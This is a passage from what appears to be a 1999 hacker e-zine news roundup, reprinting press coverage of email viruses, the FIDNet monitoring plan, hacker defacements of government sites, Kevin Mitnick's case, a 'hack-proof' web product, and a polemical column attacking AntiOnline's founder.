10.0 New virus due to hit town "New virus spills your beans " - BBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by D----Y
BBC
http://news.bbc.co.uk/low/english/sci/tech/newsid_381000/381054.stm
Tuesday, August 3, 1999 Published at 15:11 GMT 16:11 UK
New virus spills your beans
A new strain of computer virus could distribute your highly confidential documents all over the Internet.
Anti-virus developers are warning that they cannot develop an antidote until the virus appears. Far from
destroying vital files, the virus will make sure everyone can see them.
The new virus is expected to be a variant of either Melissa or the Explore.Zip worm, both of which have
cost businesses millions in recent weeks.
Both Melissa and the Explore.Zip worm rely on people opening email attachments. Once into the computer
the virus sends a message to everyone in the victim's in-box and then destroys every file written in
Microsoft Word, Excel or Powerpoint, among others.
New virus on the block
One variant has already appeared. PrettyPark replicates itself by sending copies to everyone in the victim's
address book.
It waits silently until the victim is on the Internet, then sends lists of the victim's user names, password
files and address lists to Internet Relay Chat channels. Anti-virus developers are expecting the next step to
be a virus which roots around in your files and then posts your documents across the Internet.
"The virus wouldn't be able to tell which of your documents are secret. It might just post your shopping list,
or it could be a highly sensitive company document.
"What's more, it would appear as if you sent it," says Graham Cluley of Sophos Anti-Virus.
Several anti-virus makers already have an answer to PrettyPark. But they cannot build a defence against future
variants until they encounter them.
Java and ActiveX - next infection target
It is predicted that the next generation of viral infections will hit small Webpage programmes called applets,
written in Java and particularly ActiveX.
A recent survey revealed that more than half of medium-sized organisations using an intranet had no security
policy in place to respond to the threat of attacks on Java applets.
Recent estimates indicate that Melissa, Explore.Zip and other malicious attacks have cost US business $7.6bn
this year alone.
@HWA
11.0 New York Times Debunked - FIDNet Moves Ahead as Planned
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Ted
The Register has taken the time to actually read the
draft proposal reported on last week by John Markoff of
the New York Times. The draft proposal, now seven
weeks old, calls for the creation of the Federal Intrusion
Detection Network, or FIDNET. When the NYT reported
on this story last week privacy advocates cried foul
claiming that such a network would intrude on personal
freedoms. Obviously a closer look at the document is
warranted.
The Register
http://www.theregister.co.uk/990730-000022.html
Officials from the CIAO and NIPC and other groups have
said that the recent media attention and public outcry
over the proposed FIDNet will not prevent the plan from
going forward.
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0802/fcw-newssecurityside-08-02-99.html
The Register;
Posted 30/07/99 7:31pm by Thomas Greene in Washington
US net snooping plans debunked
Terror spread across the Net on Thursday when New York Times correspondent John
Markoff broke the Big Story: a National Security Council draft proposal will put the FBI in
control of "a sophisticated software system to monitor activities on non-military
Government networks, and a separate system to track networks used in crucial industries."
Ghastly. The body to be created will be called the Federal Intrusion Detection Network, or
FIDNET. Big Brother by another name, no doubt. Libertarian alarmists and conspiracy
paranoiacs dropped their daily meds and rose angrily, if unsteadily, to arms.
"The plan... specifies that the data [FIDNET] collects will be gathered at the National
Infrastructure Protection Center (NIPC), an interagency task force housed at the Federal
Bureau of Investigation," the Times went on, adding that "the plan strikes at the heart of a
growing controversy over how to protect the nation's computer systems while also
protecting civil liberties -- particularly since it would put a new and powerful tool into the
hands of the FBI."
But it so happens that The Register has its own copy of the draftt proposal, and unlike the
New York Times, we've actually read ours. Let's just have a peek at the text.
The first observation we make is that the text states plainly, "the GSA (General Services
Administration) is responsible for establishing the FIDNET Program Office: this includes
creating an interagency management team from the defence, intelligence, technical, legal,
and law-enforcement communities."
According to our reading, FBI's NIPC team will come in later, when FIDNET data gathered
by the GSA suggest criminal activity. Again we take the unconventional approach of
consulting the text: "FIDNET will provide raw/filtered data from network sensors and the
Federal Computer Incident Response Capability. NIPC will continue to be responsible for
further data processing."
We remain at a loss to explain why the NYT reported that FIDNET would "put a new and
powerful tool into the hands of the FBI." On the contrary, it appears that the Bureau's NIPC
will be a tool of the GSA, if and when it decides the government has been cracked.
Michael Vadis, FBI's Director of NIPC, made it clear during testimony to the Senate Y2K
Committee yesterday that the FBI will respond only where there is evidence of a federal
crime.
The only language we found in any way alarming was, "FIDNET will interface with the
currently planned intrusion detection systems being developed for DOD (Department of
Defence) and national security agencies." We didn't quite know what the pseudo-verb
"interface" was intended to mean, but we know that American law enforcement and the
military are forbidden to do a great deal in the way of "interfacing". As the very existence of
America's Act of Posse Comitatus indicates a history of some difficulty in distinguishing
between civil and military purviews, this little snippet naturally raised our eyebrows.
On this matter the Department of Justice computer crimes division declined to be helpful.
The level of interdependence between military and non-military bodies being contemplated
is indeed a controversial issue, but it seems unlikely that the final product will initiate military
involvement in civilian affairs enough to invite a popular backlash. Elections are coming up,
after all; and the FIDNET system will present itself as a tempting target for cyberterrorists if
its management becomes odious, thereby having the ironic effect of decreasing security for
government systems.
Assuming that the language of the proposal does get tidied up a bit, we can expect a much
softer line in reference to DOD's role in FIDNET. This still leaves the matter of DOD
participation in case of an emergency. The president is permitted by law to suspend the Act
of Posse Comitatus in difficult circumstances, such as insurrection, mayhem in the
streets, foreign invasion, or those the Y2K rollover might possibly present. A further bit of
constitutional intrigue will undoubtedly emerge if a foreign military organization should attack
a US civilian network related to banking, energy, transportation or some other essential
service. It does not necessarily follow that the DOD would need access to civilian networks
in order to reply on behalf of the USA.
Vadis for one thinks an organised attack is inevitable. He declined to go into specifics, but
left us with the strong impression that hostile military bodies overseas are developing the
means to disable military, government and civilian networks remotely via an internet-based
attack. Clinton's National Security Advisor, Sandy Berger, said on Thursday that there exist
"governments that we know are developing systems to get access to our computer
systems." Not an especially comforting thought. "We know that, in fact... there have been
intrusions into sensitive systems," Berger added. Whether or not such an attack is being
planned, it is certain that the US government expects one.
We wonder if the increased level of connection among government systems needed for
FIDNET to monitor them effectively might not lead to increased vulnerability. Whether it
happens, or when it happens, it is sure to be a jurisdictional nightmare; and the FIDNET
proposal does foreshadow that confusion with its own vague language.
A crucial point here is that the proposal leaked to us is in draft form and now seven weeks
old. The Register's contact on the White House National Security Council, who goes by the
name of "an administration official," made it clear that the final draft will not be ready for
submission to the President until September at the earliest. The FIDNET document is at
present quite fluid, and on its way past numerous reviewers including the Department of
Justice computer crimes division, the General Services Administration, the Department of
Defence, the National Security Council and the FBI.
Furthermore, our source at NSC tells us, the proposal currently being circulated does
address and tighten up the unfortunately vague "interface" language. The level of
involvement between DOD and non-military government agencies is intended to be little
more than an advisory relationship and a sharing of new quirks, bugs and attack techniques
much as "one police department might share tips with another in a different jurisdiction."
The language which led to an assumption by many that FIDNET might one day monitor
private-sector networks is also being clarified. NSC says that there will not be even an
opt-in programme for private users to voluntarily choose such monitoring. FIDNET will,
however, share its tricks with private enterprise, and leave it to them to implement what it
chooses, on its own nickel.
The Register will report fully and eagerly on the specific changes to the FIDNET proposal
as soon as the latest version is leaked. It might actually make sense to withhold judgment
on the piece until after it's been reviewed and polished. Just a thought. �
-=-
Federal Computer Week;
AUGUST 2, 1999
Officials: Security plan on track
In the face of privacy concerns, schedule remains unchanged
BY DIANE FRANK (diane_frank@fcw.com)
Despite public outcry and congressional interest, federal officials are sticking
to their schedule for developing and releasing a plan to protect the federal
information infrastructure from cyberattacks.
Several stories in the media last week inaccurately reported that the draft of the
National Plan for Information Systems Protection would put the FBI in charge
of monitoring private-sector and government networks for cyberattacks through
the Federal Intrusion Detection Network (Fidnet).
This touched off protests from public-interest groups about citizens' privacy, and
several members of Congress asked for a complete copy of the draft and a
briefing in the next few weeks.
Officials from the Critical Infrastructure Assurance Office (CIAO), the
National Infrastructure Protection Center and other high-level federal groups
involved in creating the plan said the attention to what is still an internal
document under development will not change anything.
"This will have no effect on the process," one senior National Security Council
official said. "It is just now completing the second round of comments from the
agencies and industry...and will be brought to the president in October."
Others stressed that the plan deals only with federal networks and that the
privacy and civil rights of Americans are being taken into account at every step.
"An important element of the Fidnet program is a legal review by the Justice
Department," said John Tritak, director of the CIAO. The plan also is being
reviewed by the chief counselor for privacy at the Office of Management and
Budget's Office of Information and Regulatory Affairs, and those reviews may
change the current version of the plan, he said.
In fact, the first version of the plan has already been reviewed by the Office of
the Assistant Attorney General, which determined it was completely legal,
according to a senior DOJ official.
The plan is based on the critical infrastructure protection plans from agencies
and industry required by Presidential Decision Directive 63 and originally was
scheduled to be sent to Congress and the president this fall, Tritak said.
It also includes programs for education and training of information security
professionals, research and development of computer security profits, and the
basis for revisions of current laws to "promote greater information sharing,
enhance systems security, and strengthen protections for civil liberties and
privacy."
Although members of Congress has known about the plan for some time, most
did not realize its extent, and that is partly what touched off a request from Sen.
Bob Bennett (R-Utah) to receive a copy of the plan, said a spokesman for the
senator.
@HWA
12.0 Computer `crackers' set sights on .gov for chaos
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by D----Y
http://www.businesstoday.com/techpages/hack08011999.htm
Computer `crackers' set sights on .gov for chaos
by Mark Mueller
Sunday, August 1, 1999
It was the kind of threat for which computer hackers are famous, a
declaration of war dripping with the risk-free bravado so common on
the anonymous Internet.
The warning, which appeared on a hacked Web page of the U.S.
Interior Department in late May, promised unrelenting attacks against
government computers to avenge an FBI roundup of hackers
associated with the group Global Hell. Just weeks earlier, Global Hell
had claimed responsibility for an attack on the White House's main
Web page.
``Now, it's our turn to hit them where it hurts by going after every
computer on the Net with a .gov,'' the message read. ``We'll keep
hitting them until they get down on their knees and beg.''
That the threat was made - risking the pique of the FBI - isn't as
surprising as the follow-through. In recent months, hackers, or
crackers, as bad-guy hackers are known, have indeed blazed through
a wide swath of government and university computers, defacing some
Web sites and shutting down others.
Among the high-profile targets: the U.S. Senate (twice), the Army,
the Navy and the Departments of Agriculture, Labor and the Interior.
Computer systems also were hit at Georgetown University, the
University of Colorado, the University of Michigan and Harvard
University.
The most brazen of the attacks targeted the lion's den itself: the FBI
Web page, which was out of service for nearly a week as
programmers beefed up security on the site.
Jim Settle, former chief of the FBI's computer crimes squad and now
an Internet security consultant, calls the FBI strike ``an out-and-out
declaration of electronic warfare.''
For some, it's a war that can't afford to be lost. The feeble network
that once was the domain of a few scientists is now a robust and
far-reaching behemoth that caters to hundreds of millions of people,
some of whom pay their taxes, buy goods and send intensely personal
information through their computers.
In the wrong hands, such information could prove embarrassing or
costly. Seen in its most sinister light, computer intrusion is a threat to
national security.
But the self-proclaimed ``warriors'' who carried out the recent
attacks against government Web sites hardly sound like cyberspace
shock troops.
Their loose-knit groups bear names like the ``Keebler Elves,'' the
``Masters of Downloading'' and ``Hacking for Girlies.''
When they hack sites, they traditionally leave behind inane scrawlings
- ``Boo! Did we scare you?'' - and ``shout-outs'' to their friends.
Those familiar with the hacking subculture say such groups are
generally composed of teens - and occasionally people in their early
20s - with a lot of computer equipment and too much time on their
hands.
``These are just immature kids doing this from their home
computers,'' said John Vranesevich, founder of Anti-Online, a group
that tracks hacker activity and that has compiled dossiers on 6,000
hackers. ``It's a game to them. They make a move, and they can't
contemplate how it affects people in the real world. It's not reality
until the FBI bangs on their door.''
Vranesevich called the recent wave of attacks a ``temper tantrum''
over the May FBI raids, in which agents confiscated computer
equipment and questioned teens in 11 cities, including Houston,
Seattle and San Diego. A spokeswoman for the FBI in Boston said the
New England office was not involved in the operation.
Those who deface Web sites - about 1,300 sites have been defaced
so far this year, according to the most reliable statistics - justify their
actions by arguing they're actually doing companies and organizations
a service by pointing out security deficiencies.
But law enforcement authorities and others who deal with hackers
dismiss the argument.
``I don't buy it,'' said Drew Williams, the founder of an AXENT
Technologies' SWAT team to deal with hacker attacks. ``Any hacker
group that has not been invited to test security is committing a
crime.''
That assessment is shared by David Green, deputy chief of the
computer crimes and intellectual property section at the Justice
Department.
``This is not just electronic graffiti,'' Green said. ``They're shutting
down access to Web sites, sometimes for hours, sometimes for days,
and it makes it impossible for people who want access to that Web
source to get it.''
Moreover, there's far more at risk than down time for Web servers,
contends Peter Mell, who conducts hacker research for the National
Institute of Standards and Technology, a division of the U.S.
Commerce Department.
``Real harm can be done,'' Mell said. ``A lot of people download their
tax forms from the IRS today. What if someone broke into the IRS
Web server and changed just a single number? It would cause
supreme chaos.''
Mell also pointed to electronic banking and stock trading, saying Web
servers today handle increasing amounts of sensitive information.
``This isn't child's play anymore,'' he said. ``I pay my bills online. I
trade stocks online. In that kind of environment, I can't afford people
breaking into computers.''
The FBI heartily agrees, though it has not characterized its
crackdown on hackers in quite the grandiose terms that hackers do.
``We don't have a war against hackers. We're following our mandate,
which is to investigate violations of federal law,'' said Bill Carter, a
spokesman for the FBI's headquarters in Washington. ``The fact that
these hackers or hacker groups have their noses out of joint over
this, we can't help that.''
Most hackers are not caught, but the recent raids suggest the FBI is
starting to get better at tracking them. The agency has about 500
open computer crimes cases at any given time.
But the federal agents' methods - charging in with warrants and
bulletproof vests - worries some in the hacking community.
``For those of us in the scene for a number of years, it's starting to
get scary only because we worry it's going to turn into a witch hunt,''
said Space Rogue, a member of the Boston-area group L0pht Heavy
Industries, a former hacker clan that now bills itself as an electronic
think tank.
``While defacements will probably continue no matter what law
enforcement officials do, it would be very easy for the government to
just start executing search warrants left and right, seizing computers
and scaring people half to death.''
Internet watchdogs - and some hackers themselves - say that while
the crackdown should continue, the real issue is computer security.
Space Rogue argues that nearly all Web page defacements are
carried out with known security flaws in software. As an example, he
said, his group e-mailed the Army's webmaster about a flaw in its
ColdFusion server software a month before someone used the hole to
hack into the Army's Web site.
``It comes down to the person in charge of the machine and whether
they're taking their security seriously,'' Space Rogue said. ``This sort
of thing never should have happened in the first place.''
Settle, the former FBI computer crimes chief, says the danger will be
far greater when those doing the hacking aren't teens out for kicks
but terrorists intent on electronic warfare.
``Our computer systems today are like cars operating without safety
equipment: no headlights, no bumpers, no airbags, no roofs,'' he said.
``Heck, if teenagers can do this, what can sophisticated intelligence
operatives do? This is just a taste of things to come.''
The government acknowledges as much.
In testimony before a congressional panel, government security
experts said government computers are easy marks because
employees lack training, because well-trained staff flee for the bigger
paycheck of the private sector and because internal security
procedures often aren't followed.
``Most federal agencies continue to lack the ability to detect against
and recover from cyber attacks,'' U.S. Rep. Connie Morella (R-Md.),
chair of the House Science Subcommittee on Technology, said at the
June 23 hearing.
To combat the deficiency, the Clinton administration last week
proposed spending $1.5 billion in the next fiscal year on a
sophisticated intruder warning system that would be installed on
military, government and private-sector computer networks by 2003.
Operating something like a burglar alarm, the system would detect
break-ins, funneling that information to a central location.
``A concerted attack on the computers of any one of our key
economic sectors or governmental agencies could have catastrophic
effects,'' Clinton wrote in a draft cover letter accompanying the
proposal.
Civil libertarians and Internet privacy watchdogs already have
protested the plan, saying it will give the government unprecedented
surveillance powers, equipping authorities with the tools to peruse the
private dispatches of the masses.
House Majority Leader Dick Armey (R-Texas) joined in the criticism,
deriding the plan as an opportunity for ``government peeping toms.''
No matter the government response, hackers will, no doubt, continue
mounting challenges, probing for deficiencies in networks and deriding
those who chase them.
``You can stop one, but you can not stop all,'' hackers wrote when
they defaced the U.S. Senate Web page for the second time in late
June.
A more recent defacement of an obscure Venezuelan Web page
repeated the theme, carrying a ``call to arms'' imploring competing
hacker groups to unite to ``win this war.''
``Remember, this is our world, not the government's,'' the page read.
Time will tell.
Prosecuted `cracker' a martyr to techies
In hacker circles, he is a modern-day martyr, a technological tinkerer
whose attacks on other people's computers amounted to harmless
exploration before the FBI swooped down on him, dubbing him Online
Enemy No. 1.
To prosecutors and to judges, he is a dangerous miscreant whose
ability to crack computer systems and whose propensity for running
from the law required that he be held without bail.
Kevin Mitnick, for four years the cause celebre of the Internet's dark
side, could soon be going free.
Mitnick, 35, who pleaded guilty in March to multiple counts of
computer and wire fraud for breaking into systems and stealing
software from such companies as Sun Microsystems, Novell, Motorola
and Nokia, will be sentenced Aug. 9 under a plea agreement that
could, with good behavior credits, allow him to leave federal prison
within weeks.
``Kevin is optimistic that this case will be over and that he can get
on with his life,'' said Mitnick's lawyer, Donald C. Randolph of Santa
Monica, Calif.
But even if Mitnick himself fades into obscurity, his cause is unlikely
to follow. In the hacking community, Mitnick long ago became a
symbol of what hackers term gross government over-reaction, a
theme repeatedly hammered home by Randolph.
``The government prosecution of Mr. Mitnick was to carry out an
agenda launched by them in the 1990s,'' Randolph said.
``The government wanted to demonstrate they were going to be
tough on computer terrorism. Unfortunately, the government did not
have a bonafide computer terrorist to prosecute, so they went after
Mr. Mitnick, a recreational hacker who was arrested with a big splash
and who became a convenient target.''
Randolph's comments could be dismissed as the arguments of a
defense lawyer looking to gain sympathy for his client, but he's not
the only one making them.
Drew Williams, who founded Axent Technologies' SWAT team to
respond to hacking incidents for clients, said the government
miscalculated with Mitnick.
``I am not a Mitnick supporter at all. However, I think the
government did in fact set out to make an example and instead made
a martyr,'' Williams said. ``An individual's rights to due process
probably got a little trampled.''
Denied bail on charges that could have initially landed him in jail for a
century, Mitnick appealed all the way to the U.S. Supreme Court,
where the justices declined to hear his lawyer's argument that bail
should be set.
Hackers have seized on the bail issue, leaving ``Free Kevin''
messages on the Web sites they hack. Recent examples include the
home pages of the U.S. Senate and Greenpeace, where hackers left
the tongue-in-cheek message ``Free Mitnick or we will club 600 baby
seals.''
There is also a ``Free Kevin'' Web site (www.freekevin.com) that
gives Mitnick updates and carries a confinement clock showing - to
the second - how long Mitnick has been jailed.
Randolph argues that while people should be prosecuted for breaking
into systems, the law needs to be refined to distinguish between
recreational hackers and information terrorists.
``I do not quarrel at all with the government's right to prosecute
computer fraud and to go after computer terrorists, but it's high time
they distinguish between high crimes and misdemeanors so they're
not trumpeting the arrest of the century when the suspect is a kid on
a laptop,'' Randolph said.
Mitnick's prosecutors insist they have not overreached, that Mitnick
caused millions in damage by stealing and changing information in
computer systems.
``This is someone whose conduct over a 2-year period was very
broad and very serious,'' Assistant U.S. Attorney Christopher Painter
said. ``He hit a huge number of companies with a lot of damage. He
is not the victim.''
If Mitnick does win his freedom soon, it could be short-lived. The Los
Angeles County District Attorney's Office is preparing its own case
against him on charges similar to the federal claim.
Randolph said he's confident Mitnick, in the end, will prevail.
``In 1995, the press and the public were fooled into thinking Kevin
Mitnick was this cyber bogeyman,'' he said. ``That type of argument
doesn't fly in 1999. People know better.''
Sites that have been targeted
Here's a partial list of Web sites that have been attacked in recent
months. In most cases, the sites were defaced. In others, a flood of
requests for service overwhelmed Web servers, rendering them
unusable. In several of the attacks, the intruders called the acts
revenge for FBI ``harassment'' of hackers.
Bell South
eBay (on-line auctioneer)
FBI
Fort Monmouth (N.J.) U.S. Army Garrison
Georgetown University
Harvard University
Idaho National Engineering and Environmental Laboratory (conducts
research for the U.S. Department of Energy)
Illinois Comptroller's Office
NASA Goddard Space Flight Center
National Oceanic and Atmospheric Administration Storm Prediction
Center
State of Virginia home page
University of California-Davis
University of Colorado
University of Michigan
University of Wisconsin
U.S. Army main Web site
U.S. Coast Guard
U.S. Department of Agriculture
U.S. Department of Education
U.S. Department of the Interior
U.S. Department of Labor
U.S. Information Agency
U.S. Navy
U.S. Senate (twice)
The White House
@HWA
13.0 IIS Server 'hackproof'?
~~~~~~~~~~~~~~~~~~~~~~~
contributed by Code Kid
A small company in Sydney Australia, called Creative
Digital Technology, has claimed to have created
software that will make web pages on IIS Servers 'hack
proof'. The software, known as SecurePage digitally
signs all pages and then compares those signatures
against encrypted master copies. If the signature
changes then the web server will stop serving the page.
They have issued a challenge to get people to try and
break the system, however, the information on the
challenge is difficult to find.
The Australian
http://technology.news.com.au/techno/4108922.htm
Internet News
http://www.internetnews.com/intl-news/article/0,1087,6_174011,00.html
Creative Digital Technology
http://www.creative.com.au/
Developer issues hacker challenge
By JENNIFER FORESHEW
3aug99
A SMALL Sydney company that has developed software designed to
make Web sites hack-proof, has thrown out a challenge to crack the
technology.
Creative Digital Technology (CDT) has developed software which, when
downloaded, makes a site secure.
"We are prepared to stand behind that financially by offering a prize to
universities to see if they can do what our developers haven't been
able to do," CDT chief operating officer Philip Burton said.
CDT, which developed the country's first SET (Secure Electronic
Transaction) enabled products, is launching the SecurePage product at
Internet World 99 this week.
"We can protect any Web site," CDT chief executive Bahram Boutorabi
said. "The first version of the product runs on Microsoft's Internet
Information Server platform, but we are planning to roll out across all
platforms."
Mr Boutorabi, who is also technology officer, said many sites could be
hacked because they were developed using mostly straight text.
"We have developed the technology to put something into Active
Server Pages, HTML, Net Commerce Mark-up Language and XML, which
represents a signature that someone has made against that page," Mr
Boutorabi said.
Any attempt to alter a Web site's content would result in action being
taken by the system, which is protected by 192-bit, Triple-DES
encryption.
"If the contents of that page have been altered for any reason it will
stop serving that content out and serve it from its own content area,
where everything is fully encrypted," Mr Boutorabi said.
"SecurePage enables an administrator to put a disc into the system, run
the administration and tell it to sign all of the pages with their
password.
"To alter the code or text, you have to have administrative access to
change the content or to stop the system."
Mr Burton, who is also a senior partner in CDT, said the company began
working on the technology after attacks on high-profile Web sites.
"This came about from evidence that significant Web sites were being
hacked and destroyed.
"We believed we could deliver a protection device in software form that
could be downloaded from our Web site by whoever was hosting that
particular site.
CDT declined to reveal further details of the technology pending
approval of a patent on SecurePage.
If you decide to take up CDT's challenge to crack its software,
Computers & High Technology wants to know. E-mail us at
auscomp@ozemail.com.au � but only if you are successful.
Internet News
http://www.internetnews.com/intl-news/article/0,1087,6_174011,00.html
Australian Web Innovations Debut at IW Sydney
August 4, 1999
By Gerard Knapp
InternetNews.com Australian Correspondent
International News Archives
[Sydney, AUSTRALIA] Several Australian companies have used the Internet World Australia 99 exhibition to launch new
products.
Sydney-based startup Pure Commerce has introduced Pure Global Pay, a payment gateway service which can accept 32 different
currencies without merchants needing to establish relationships with non-Australian banks.
E-commerce developer Creative Digital Technology is debuting two software applications: a wallet which supports the Secure
Electronic Transactions (SET) standard for e-commerce transactions called ActiveWallet, and a solution for attempts by hackers to
deface corporate Web sites called SecurePage.
The ActiveWallet client is an 850KB client-side applet which enables consumers to pay bills and buy products using credit cards in
a drag and drop environment. The client is designed to support transactions using the SET-certified merchant server technology of
US-based GlobeSet.
SecurePage attaches digital signatures to static Web pages and dynamically generated components so that they can be compared
against an encrypted master version to check if they have been altered by malicious hackers.
Allaire has also used Internet World as its Australian launch for Spectra, its Web content management product.
The show has also coincided with the announcement that US-based analyst firm Jupiter Communications had filed preliminary
documents for an IPO. Wednesday keynote speaker Gene De Rose, who is CEO and 21.8 per cent stake holder of Jupiter, is
poised to become the next Internet multi-millionaire.
The Internet World 99 Best of Show product awards, judged by journalists at Internet World Australia magazine, will be
announced on Wednesday.
14.0 Latest CWD Pokes at AntiOnline
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
The CyberWire Dispatch, a mailing list newsletter, has
some very interesting things to say about John
Vranesevich and Antionline. CWD writer Lewis Z. Koch
makes some powerful observations about his past
dealings with and the writings of Mr. Vranesevich. (If
you have been following the antics of AntiOnline at all
this is a must read piece.)
CyberWire Dispatch- republished with permission
Note: CyberWire Dispatch is a mailing list only newsletter.
It is reprinted here with permision. Subscription
information is at the end.
CyberWire Dispatch // August 1999
// All Rights Reserved
Jacking in from the "Pine-Sol" port:
By Lewis Z. Koch
CWD Special Correspondent
Twenty-year-old John Vranesevich calls his AntiOnline
Web site "a valuable tool in the fight against 'CyberCrime'"
In a call to arms, this self-anointed, junior G-man
wannabe, promises to uncover, reveal and inform on
hackers and other miscreants.
Out of this misguided cyber-vigilantism, arises the
"denunciator" virus, which reaches its full lethality in
totalitarian states but also finds a home in democratic
societies as well, usually in climates of social resentment,
political fanaticism, or, my personal favorite, political
self-righteousness.
The Denunciator virus, known also as the "Accuser" virus,
destroys careers, leaves permanent scars, called
"blacklists," gives rise to false alarms, warnings or
contrived "cautionary tales" meant to lull or divert
citizens. The natural host for this virus is believed to be a
species of the rodent called a "snitch," aka squealer, stool
pigeon, informer; rat bastard.
Every delusional crusader needs a mission statement,
Vranesevich is no different. This self-anointed
sheriff-of-cyberspace pens this Uber-warning to hackers:
"I know that some of you are playing what you feel is a
game. A game that you think you are winning. Some of
you sit back and laugh at organizations like the FBI. You
make sure that you provide enough information to make it
obvious who you are, yet are careful not to provide
enough information to actually have it proven. I have
been watching you these past 5 years. I know how you
do the things you do, why you do the things you do, and I
know who you are."
And if you're keeping score-and you should be-you'll note
that Vranesenvich apparently started down this crusader
road at the tender age of 15 or just about the time he
figured his Johnson could be used for more than simple
utilitarian bodily functions.
This not-very subtle paean to cyber-vigilantism could
easily be dismissed save for the fact that Vranesenvich
has earned a demi-celebrity status from journalists
working for publications from which we have come to
expect more judicious sourcing, including, but not limited
to, Matt Richtel of The New York Times, John Schwartz of
The Washington Post and even, sadly, CWD's own Brock
Meeks while cloaked in his alter-ego as Washington
correspondent for MSNBC.
And we wonder why fewer and fewer people trust the
media.
Hung With His Own Rope
=====================
In his mission statement Vranesevich unequivocally
states, "I've seen myself talking with people who have
broken into hundreds of governmental servers, stolen
sensitive data from military sites, broken into atomic
research centers."
Question is, can we believe him?
There's his rather perplexing story about hackers breaking
into an "Israeli" atomic research center.
At first, as Vranesevich tells it, when hackers told him
what they had done, he "freaked" even thought the boast
might be "far fetched." But these hackers sent him a
"folder full of documents written in a foreign language"
they claimed they had copied from the "B'Hadvah" Atomic
Research Center. [Note: Vranesevich didn't know how to
spell the name of the so-called research center].
"Were the documents in Hebrew or English?" I asked.
"Bengali."
When he broke the "story" on his AntiOnline web site, all
media hell broke loose.
"Every mainstream media started calling and questioning
and calling the research center," Vranesevich said. "I had
all these nuclear arms proliferation people calling. Here I
am in my parent's living room, and one day, thirteen calls
from anti-nuclear proliferation and pro-nuclear proliferation
(sic) groups wanting to know - is this significant, what is
Israel doing?"
I was still having a problem with the "Bengali" aspect to
the documents.
"Ah, John," I asked, "is this an Israeli research center or
could it be Indian? Pakistani?"
Silence. Then Vranesevich said, "I think it's Indian. Who
was the one that just did the nuclear testing?"
"That was India and Pakistan, not Israel."
"Oh, then this was India, not Israel."
Oh.
Then there's his story about changing medical
records-pretty serious stuff. Can we take him at his word
there?
"[I]'ve seen people change the medical records of
individuals in our armed services" Vranesevich asserts in
his "mission" statement.
When asked about these nefarious deeds, Vranesevich
works himself up into a high dudgeon about hackers
breaking into sites and changing medical records.
"What would have happened if medical records had been
changed and a cancer patient received the wrong
treatment for it?...What if I had looked into who these
[hacker] guys were, a little further? What would have
happened if I would have published the story? What would
have happened if CERT had come out and said medical
records had been changed and a cancer patient received
the wrong treatment because of it!"
I questioned him closely. "You really saw people change
the medical records of individuals in our armed forces?"
"I don't mean that literally," backtracking as fast as his
voice could carry him. "You see the language I was using?
I don't mean literally 'I saw them do it, I saw it happen.'
It's something that transgressed (sic) before. It's like we
saw our country go through three wars. It doesn't mean I
caused (sic) the three wars. You see what I'm saying? Or
I've seen crime happen over and over again in my
neighborhood. Doesn't mean I literally saw it. You know
what I mean? I don't know if I'm making myself clear." Ah,
er.. right. He gave it one more chance.
"Looking back in retrospect (sic). It was like actions that
transgressed (sic) before. I've sort of watched the events
transfold (sic) before my eyes."
Yep, that clears it up; someone get this guy an English
tutor...There's more like that but after a while it gets,
well, boring.
Vranesevich also claims a "semi-contractual" relationship
with all kinds of official military and police types, including
one with the NASA and one with the Defense Information
Systems Agency (DISA).
Can we believe him?
NASA says no. After checking with their databases "they
could find no record of NASA having done business with
Mr. Vranesevich or his company AntiOnline," reports
Patricia M. Riep-Dice, NASA Freedom of Information Act
Officer.
According to a DISA spokesman, no such relationship
exists. None. Nada.
In Other People's Words
=======================
In his grasp for distinction, celebrityhood, acclaim,
Vranesevich overreaches, as he did with his claim of
unethical behavior on the part of computer security expert
Marcus Ranum. Ranum's "crime"? "Guilt-by-association"
with two hacker groups, L0pht Heavy Industries and cult
of the Dead cow (cDc).
L0pht Heavy Industries is among the finest Microsoft
error-catchers in the world; it is a company with
employees and it pays taxes. "cult of the Dead cow" is a
group of hackers in the tradition of Yippie founders Abbie
"Steal This Book" Hoffman and Jerry Rubin.
The cDc promises Internet chaos, anarchy and terror; in
1968, in Chicago, Abby Hoffman and Jerry Rubin
threatened to pour LSD in the water and send Yippie
studs to O'Hare airport to seduce the wives of delegates
to the Democratic National Convention. If that analogy is
lost on you, cut your losses now, stop reading and return
to your "Internet for Dummies" workbook.
L0pht and cDc tend to despise Microsoft, but then so do a
lot of people, including folks in the Justice Department.
More than likely there is cross-over contact between
L0pht and cDc since the two have much in common, in
the same way journalists from different newspapers and
television tend to hang out at the same bars, buy each
other drinks and complain about stupidity and venality of
their editors.
cDc had been tinkering around the multiplicity of holes,
vulnerabilities and general screw ups in the Microsoft
Windows operating system. They developed a
back-dooring program for Win 95, one that allowed a
Trojan Horse to exploit that vulnerability.
In a stroke of genius that would make an Wizard of
Madison Avenue green with envy, they dubbed the
program "Back Orifice."
Ranum developed a program to counteract Back Orifice
and called it "Back Officer Friendly." Vranesevich claims he
was "shocked, shocked" to discover that Ranum might
have had conversations with hackers at L0pht, perhaps
even some at cDc about Back Officer Friendly.
Vranesevich's story alleged that Ranum could have even
been talking with the very people at cDc who developed
the exploit in the first place. So what do we have here?
Collusion? Duplicity? Ethical lapse? Double-agentry?
Whom to believe?
================
Bell Labs' William R. Cheswick, co-author with Steven
Bellovin of the exemplary "Firewalls and Internet Security -
Repelling the Wily Hacker," says of Ranum: "I have worked
with Marcus for years. He is a strong force for Good
against Evil. A security person is paid to think bad
thoughts, and Marcus is quite good at it. The key is that
he doesn't do the bad stuff, but uses this approach to
make things safer."
Bellovin, himself a world-class computer expert, certainly
doesn't equivocate. Ranum has "been a strong, positive
force for Internet security, both in the sense of building
useful tools and in the sense of teaching other people
important principles. I've also never heard any serious
question about his ethics."
"Marcus has one of the most fluent understandings of
Internet security I have ever seen," says Bruce Schneier,
whose books on encryption and on privacy can trigger a
physical and intellectual hernia, "his ability to see threats
and attacks, defenses and countermeasures, makes him
